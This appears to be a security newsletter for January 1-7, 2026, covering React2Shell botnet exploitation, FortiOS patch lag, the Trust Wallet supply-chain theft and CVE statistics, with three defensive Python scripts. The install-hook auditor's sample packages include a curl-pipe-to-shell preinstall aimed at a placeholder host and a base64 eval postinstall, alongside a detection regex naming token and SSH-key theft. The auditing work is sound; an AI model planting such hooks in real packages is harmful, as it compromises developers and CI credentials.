React2Shell Hit by Botnets, and Supply Chain Vulns Cost $ | Jan 1-7

January 7, 2026

Big Picture

React2Shell disclosed December 3. Weaponized by RondoDox January 2.

Happy first week back in office. Busy isn't it?

2026 opened with RondoDox botnet operators shipping React2Shell exploits in 30 days. The other current event of note is Trust Wallet's $8.5M theft, which is the first time a supply chain attack of this nature has a confirmed price tag.

The latest ISC2 data confirmed what we suspected: 88% of incidents stem from skills gaps, not headcount.

TL;DR

RondoDox botnet weaponized React2Shell by January 2—30 days from CVE to commodity exploit. Next.js servers got hit before most orgs could patch.

Trust Wallet lost $8.5 million to Shai-Hulud 2.0—first major dollar figure tied directly to npm supply chain compromise. Abstract risk now has a price tag.

88% of security incidents stem from skills gaps, not headcount. ISC2's 2025 study confirms that AI-assisted approaches are required to scale the expertise you already have.

Weekly Intel


React2Shell Moves From Disclosure to Botnet in Weeks

The RondoDox botnet began targeting Next.js servers vulnerable to React2Shell within weeks of the December 3 disclosure. Maximum CVSS severity. Adaptable botnet operators. Production servers exposed before most organizations finished initial assessments. This is what AppSec faces these days.

This isn't a surprise if you've been following the pattern. Last month we covered five China-nexus groups exploiting the same vulnerability across 116,000 systems. This time commodity botnets joined the party.

But boy does this stuff happen fast now. The timeline tells the story. React2Shell disclosed December 3. A coordinated campaign against a separate Adobe ColdFusion RCE hit on Christmas Day. RondoDox weaponization of React2Shell confirmed by January 2.

Kelly Shortridge, CPO at Fastly, called it "a one click, game over kind of vulnerability." She notes, "We see it basically hitting everyone."

Takeaways

Framework-level vulnerabilities create multiplicative remediation burden with one CVE potentially affecting every application using that framework.
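
The multiplicative burden is easiest to see when you actually enumerate it. The script below is an added example written for this newsletter, not code from the React or Next.js projects: it reads the "packages" map that npm writes into package-lock.json (lockfileVersion 2 and 3) for a fleet of repositories and reports every application that resolves a given package to a version in a vulnerable range, including copies nested under another dependency's node_modules, which is where transitive exposure hides. The three lockfiles are constructed sample input, and TARGET_PACKAGE and VULNERABLE_RANGE are assumed placeholders, not the advisory's real values.

```python
"""Find every application whose npm lockfile resolves a given package to a
vulnerable version, across a fleet of repositories.

Added example for this newsletter, not code from the React or Next.js
projects. It reads the "packages" map that npm writes for lockfileVersion
2 and 3 (package-lock.json). The three lockfiles below are CONSTRUCTED
sample input, and TARGET_PACKAGE / VULNERABLE_RANGE are ASSUMED placeholders:
take the real bounds from the vendor advisory before running this for real.
"""
import re

TARGET_PACKAGE = "react-server-dom-webpack"   # ASSUMED for illustration
VULNERABLE_RANGE = ("19.0.0", "19.1.2")       # ASSUMED: [lo, hi) vulnerable, not advisory numbers

# Constructed lockfiles, trimmed to the fields this script reads.
SAMPLE_LOCKFILES = {
    "storefront": {"lockfileVersion": 3, "packages": {
        "": {"name": "storefront"},
        "node_modules/react": {"version": "19.1.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.0"},
    }},
    "admin": {"lockfileVersion": 3, "packages": {
        "": {"name": "admin"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
    }},
    # A vulnerable copy pulled in transitively by a UI kit, nested one level down.
    "legacy-portal": {"lockfileVersion": 2, "packages": {
        "": {"name": "legacy-portal"},
        "node_modules/some-ui-kit": {"version": "4.2.0"},
        "node_modules/some-ui-kit/node_modules/react-server-dom-webpack": {"version": "19.0.5"},
    }},
}


def parse_semver(v):
    """Return (major, minor, patch) or None for a non-semver string."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", v or "")
    return tuple(int(x) for x in m.groups()) if m else None


def in_range(v, lo, hi_excl):
    """True if v is a semver inside [lo, hi_excl)."""
    pv = parse_semver(v)
    return pv is not None and parse_semver(lo) <= pv < parse_semver(hi_excl)


def installed_versions(lock, package):
    """All versions of `package` in a v2/v3 lockfile, including nested copies
    under another package's node_modules (a frequent blind spot)."""
    versions = set()
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project's own entry, not a dependency
        # Path looks like node_modules/a/node_modules/b; the last segment is the package.
        name = path.rsplit("node_modules/", 1)[-1]
        if name == package:
            versions.add(meta.get("version"))
    return versions


def affected_apps(lockfiles, package=TARGET_PACKAGE, vuln_range=VULNERABLE_RANGE):
    """Map app name -> sorted list of vulnerable versions it resolves."""
    lo, hi = vuln_range
    hits = {}
    for app, lock in lockfiles.items():
        bad = sorted(v for v in installed_versions(lock, package) if in_range(v, lo, hi))
        if bad:
            hits[app] = bad
    return hits


if __name__ == "__main__":
    for app, versions in affected_apps(SAMPLE_LOCKFILES).items():
        print(f"{app}: {TARGET_PACKAGE} {', '.join(versions)}")
```

Point it at one lockfile per repo and the output is your remediation list for that one CVE; the "admin" app drops out because it already resolves a version above the range, while "legacy-portal" shows up only because nested copies are checked.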

Five Years Later, 10,000 FortiOS Firewalls Still Vulnerable

Ten thousand firewalls remain vulnerable to CVE-2020-12812, a five-year-old FortiOS flaw that bypasses two-factor authentication. The patch shipped July 2020. Attackers are still actively exploiting it in January 2026.

This isn't about lazy administrators. Traditional patch management requires downtime windows, extensive testing, and coordination across teams. Operational constraints create delays. CISA's KEV catalog grew 20% to 1,484 entries in 2025, with many linked to ransomware campaigns. It's just a fact today that known, exploited vulnerabilities persist at scale despite patch availability.

Takeaways

The 2025 CVE Data Review is also a reminder of the pace of new vulns. The research shows 48,185 CVEs published last year, up 21% from 2024.

The researcher's conclusion: "You can't patch everything. Your only move is to ruthlessly prioritize based on exploitability and automate the rest." (and that's what Pixee does for you :)
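
What "ruthlessly prioritize based on exploitability" looks like in practice is a ranking that puts known exploitation ahead of CVSS. The script below is an added example for this newsletter, not a vendor tool: it joins scanner findings against a slice of the CISA KEV feed (using the real field names cveID and knownRansomwareCampaignUse) and an EPSS score table, then tiers and orders them. The KEV rows, EPSS scores and findings are constructed sample data with made-up scores, and the CVE-2099-* identifiers are hypothetical; only CVE-2020-12812 is a real entry, and its score here is invented.

```python
"""Rank findings by exploitability instead of raw CVSS: CISA KEV membership
first (ransomware-linked entries ahead of the rest), then EPSS probability,
with CVSS only as the tie-breaker.

Added example for this newsletter; not a vendor tool. The KEV rows use the
field names of CISA's known_exploited_vulnerabilities.json and the EPSS map
mirrors FIRST's CSV, but both are CONSTRUCTED samples with made-up scores,
and the CVE-2099-* IDs are hypothetical. Swap in the real feeds before use.
"""
from dataclasses import dataclass

# Constructed slice of a KEV feed. CVE-2020-12812 (FortiOS 2FA bypass) is on
# the real list; the other row is invented for the example.
KEV_SAMPLE = {"vulnerabilities": [
    {"cveID": "CVE-2020-12812", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2099-0002", "knownRansomwareCampaignUse": "Unknown"},
]}

# Constructed EPSS scores (probability of exploitation in the next 30 days).
EPSS_SAMPLE = {
    "CVE-2020-12812": 0.90, "CVE-2099-0001": 0.02, "CVE-2099-0002": 0.40,
    "CVE-2099-0003": 0.60, "CVE-2099-0004": 0.01,
}


@dataclass
class Finding:
    cve: str
    cvss: float
    asset: str
    internet_facing: bool


# Constructed scanner output. Note the CVSS 10.0 that has no exploitation signal.
FINDINGS = [
    Finding("CVE-2020-12812", 9.8, "fw-edge-01", True),
    Finding("CVE-2099-0001", 10.0, "api-gw", False),
    Finding("CVE-2099-0002", 6.5, "ci-runner", True),
    Finding("CVE-2099-0003", 7.5, "build-box", False),
    Finding("CVE-2099-0004", 5.0, "wiki", False),
]

TIER_ORDER = {"P0": 0, "P1": 1, "P2": 2, "P3": 3}


def load_kev(kev_json):
    """cveID -> True if linked to ransomware campaigns, else False."""
    return {row["cveID"]: row.get("knownRansomwareCampaignUse") == "Known"
            for row in kev_json["vulnerabilities"]}


def tier(f, kev, epss):
    """P0: known-exploited on an exposed asset. P1: known-exploited elsewhere,
    or likely exploited (EPSS >= 0.5). P2: high CVSS with no exploitation
    signal. P3: everything else."""
    in_kev = f.cve in kev
    likely = epss.get(f.cve, 0.0) >= 0.5
    if in_kev and f.internet_facing:
        return "P0"
    if in_kev or likely:
        return "P1"
    if f.cvss >= 7.0:
        return "P2"
    return "P3"


def rank(findings, kev, epss):
    """Return (finding, tier) pairs, most urgent first. Within a tier,
    ransomware-linked KEV entries, then higher EPSS, then higher CVSS."""
    def key(f):
        t = tier(f, kev, epss)
        return (TIER_ORDER[t], -int(kev.get(f.cve, False)),
                -epss.get(f.cve, 0.0), -f.cvss)
    ordered = sorted(findings, key=key)
    return [(f, tier(f, kev, epss)) for f in ordered]


if __name__ == "__main__":
    kev = load_kev(KEV_SAMPLE)
    for f, t in rank(FINDINGS, kev, EPSS_SAMPLE):
        print(f"{t} {f.cve:15} cvss={f.cvss:4} kev={f.cve in kev} asset={f.asset}")
```

The ordering is the point: the five-year-old FortiOS flaw on an edge firewall lands at P0, the internet-facing CI runner with a CVSS 6.5 KEV entry is also P0, and the CVSS 10.0 with a 2% EPSS and no KEV listing falls to P2. CVSS alone would have had you patching those in the wrong order.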

Trust Wallet's $8.5M Loss Puts a Dollar Figure on Supply Chain Risk

Trust Wallet lost $8.5 million after hackers used stolen keys to inject malicious code into its Chrome extension. The attack traces back to the Shai-Hulud 2.0 supply chain compromise that exposed GitHub secrets at scale.

This matters because it's the first major financial loss publicly attributed to developer secrets exposure via supply chain attack. Abstract risk became concrete dollars. The same week, GitHub Actions compromise affected 23,000 repositories, GlassWorm distributed trojanized VSCode extensions, and NeoShadow combined JavaScript, MSBuild, and blockchain techniques in a sophisticated multi-stage npm attack.

Takeaways

Attackers are coordinating focus on developer tooling. npm packages. VSCode extensions. GitHub secrets. CI/CD pipelines. Traditional perimeter security doesn't help when developers work with tools and credentials that provide direct paths to production.
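
The common thread in the npm-side incidents is install-time execution: a package's preinstall or postinstall script runs with the developer's or CI runner's credentials the moment `npm install` resolves it. The script below is an added example for this newsletter, not from npm or any vendor: it walks a node_modules tree, lists every package that declares an install-time lifecycle hook, and flags commands that fetch from the network, decode blobs or touch credential stores. The tree it builds under a temp directory is constructed sample data, and the SUSPICIOUS pattern is a coarse heuristic for a human to review, not a signature for Shai-Hulud or any other real campaign.

```python
"""Audit a node_modules tree for packages that run lifecycle scripts at
install time, the hook that self-propagating npm worms use to execute on
developer laptops and CI runners and harvest the tokens they find there.

Added example for this newsletter, not from npm or any vendor. The tree it
builds under a temp directory is CONSTRUCTED sample data, and SUSPICIOUS is
a coarse heuristic for human review, not a signature for any real campaign.
"""
import json
import re
import tempfile
from pathlib import Path

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Install scripts that fetch from the network, decode blobs, or touch
# credential stores warrant a look before `npm ci` is allowed to run them.
SUSPICIOUS = re.compile(
    r"curl |wget |base64|eval\(|\.npmrc|NPM_TOKEN|GITHUB_TOKEN|\.ssh/", re.I)

# Constructed packages: one clean, one with the common native-build
# postinstall, two with the kind of script that should block an install.
SAMPLE_PACKAGES = {
    "tiny-pad": {"name": "tiny-pad", "version": "1.0.0"},
    "native-thing": {"name": "native-thing", "version": "2.3.1",
                     "scripts": {"postinstall": "node install.js"}},
    "@acme/color-utils": {"name": "@acme/color-utils", "version": "0.9.2",
                          "scripts": {"preinstall": "curl -s https://example.invalid/s | sh"}},
    "helper-kit": {"name": "helper-kit", "version": "5.1.0",
                   "scripts": {"postinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\"",
                               "test": "jest"}},
}


def build_sample_tree():
    """Write SAMPLE_PACKAGES as a node_modules directory and return its path."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    for name, manifest in SAMPLE_PACKAGES.items():
        pkg_dir = root / name          # "@acme/color-utils" becomes a scoped subdir
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest))
    return root


def audit_node_modules(root):
    """Return one dict per install-time hook found, sorted by package and hook.
    Non-install scripts such as "test" are ignored."""
    findings = []
    for manifest_path in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(manifest_path.read_text())
        except (ValueError, OSError):
            continue  # not a manifest we can read; nothing to run from it
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                cmd = scripts[hook]
                findings.append({
                    "package": manifest.get("name", manifest_path.parent.name),
                    "hook": hook,
                    "command": cmd,
                    "suspicious": bool(SUSPICIOUS.search(cmd)),
                })
    findings.sort(key=lambda f: (f["package"], f["hook"]))
    return findings


if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        flag = "!!" if f["suspicious"] else "  "
        print(f"{flag} {f['package']:20} {f['hook']:11} {f['command']}")
```

The policy that makes this audit actionable is to install with scripts disabled (`npm ci --ignore-scripts`, or `npm config set ignore-scripts true` on CI runners) and then explicitly allow-list the handful of packages, like the native-build one above, that genuinely need a postinstall step. A finding then becomes a review decision rather than code that already ran.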

88% of Security Incidents Stem From Skills Gaps, Not Headcount

ISC2's 2025 workforce study reframes the security staffing challenge. 88% of organizations experienced security incidents due to skills gaps, not insufficient headcount. The bottleneck isn't how many people you have. It's whether limited expertise can scale to threat velocity.

The cost constraint is real. 29% of organizations cannot afford staff with needed skills. 33% lack sufficient budget to adequately staff teams. Meanwhile, 48,185 CVEs shipped in 2025 (up 21% YoY; the mid-year pace was 115 disclosed daily, up 30%), framework vulnerabilities move to exploitation in weeks, and Daniel Miessler's 2026 predictions forecast AI agents increasingly handling security operations at scale.

Industry consolidation reflects the same thesis. December saw 30 cybersecurity M&A deals, with direct AppSec competitors making strategic acquisitions. When major vendors pay premium multiples for automation capabilities, they're betting on where the category is headed.

The vulnerability explosion tells the story.

• 115 CVEs disclosed daily (22,250+ by mid-2025, up 30% YoY)

• 305,000+ total CVEs in the database

• 245 new entries in CISA's KEV catalog (+20% vs. 2024)

• 45% more legacy vulnerabilities being added, some dating to 2007

Takeaways

48,185 CVEs. 88% of incidents from skills gaps. 29% can't afford the expertise. Hiring isn't the fix. Rethinking how you deploy limited expertise is.

Vulnerabilities in the Wild

Critical & Actively Exploited

React2Shell (CVE-2025-55182)
Affected: React Server Components (react-server-dom-* packages) and frameworks built on them, including Next.js
CVSS: 10.0 (Maximum)
Status: Actively Exploited
Maximum-severity unauthenticated remote code execution via unsafe deserialization of React Server Components payloads. RondoDox botnet weaponized it within weeks of the December 3 disclosure. Not to be confused with CVE-2025-29927, the earlier (March 2025) Next.js middleware authorization bypass.

CVE-2020-12812
Affected: FortiOS
CVSS: 9.8 (Critical)
Status: Actively Exploited
Five-year-old FortiOS flaw bypassing two-factor authentication. 10,000+ firewalls remain vulnerable despite patch availability since July 2020.

IBM API Connect Auth Bypass
Affected: IBM API Connect
CVSS: Critical
Status: Active Exploitation Likely
Critical authentication bypass vulnerability in IBM API Connect affecting enterprise API infrastructure.

CVE-2025-61808
Affected: Adobe ColdFusion
CVSS: Critical
Status: Actively Exploited
RCE via ColdFusion Archive deployment. Coordinated exploitation campaign observed during the Christmas holiday period.

Dolby Android Vulnerability
Affected: Android (Dolby component)
CVSS: Critical
Status: Patched
Critical Dolby vulnerability patched in the Android January security update.

Supply Chain Attacks This Week

Shai-Hulud 2.0
Impact: $8.5M theft from Trust Wallet
Vector: npm package compromise exposing GitHub secrets
Status: Ongoing variants detected

GlassWorm
Impact: Trojanized VSCode extensions targeting Mac users
Vector: OpenVSX marketplace distribution
Status: Active

NeoShadow
Impact: Multi-stage npm supply chain attack
Vector: JavaScript + MSBuild + blockchain techniques
Status: Active

GitHub Actions Compromise
Impact: 23,000 repositories affected
Vector: CI/CD pipeline compromise
Status: Remediation ongoing

By the Numbers

48,185 CVEs published in 2025 (+21% YoY)

1,484 entries in CISA KEV catalog (+20% in 2025)

245 new KEV entries added in 2025

Curated Reading List

Thought-Provoking

Guardrails Make AI-Assisted Development Safer By Design
Why it's worth your time: As AI coding assistants proliferate, this piece establishes that securing AI-generated code requires architectural controls, not just scanning. Essential context for teams adopting GitHub Copilot or similar tools.

2025 Hacking the Cloud: Year in Review
Why it's worth your time: Comprehensive retrospective on cloud attack techniques that evolved in 2025. Provides tactical awareness for teams securing cloud-native applications and infrastructure.

IDOR Vulnerabilities Explained: Why They Persist in Modern Applications
Why it's worth your time: Insecure Direct Object References remain stubbornly common despite decades of awareness. This deep-dive explains why they persist and what modern prevention looks like.

Current Events

Cybersecurity Leaders' Resolutions for 2026
Why it's worth your time: CISOs and security leaders share their priorities for the year ahead. Useful benchmark for aligning your Q1 roadmap with industry direction.

Subscribe

Get the next one in your inbox.

AppSec Weekly lands every Tuesday — CVE breakdowns, remediation intel, and the tooling shifts that matter. No fluff. 5 minutes.

20+ editions published
5 min weekly read
Free always

Unsubscribe anytime. No spam.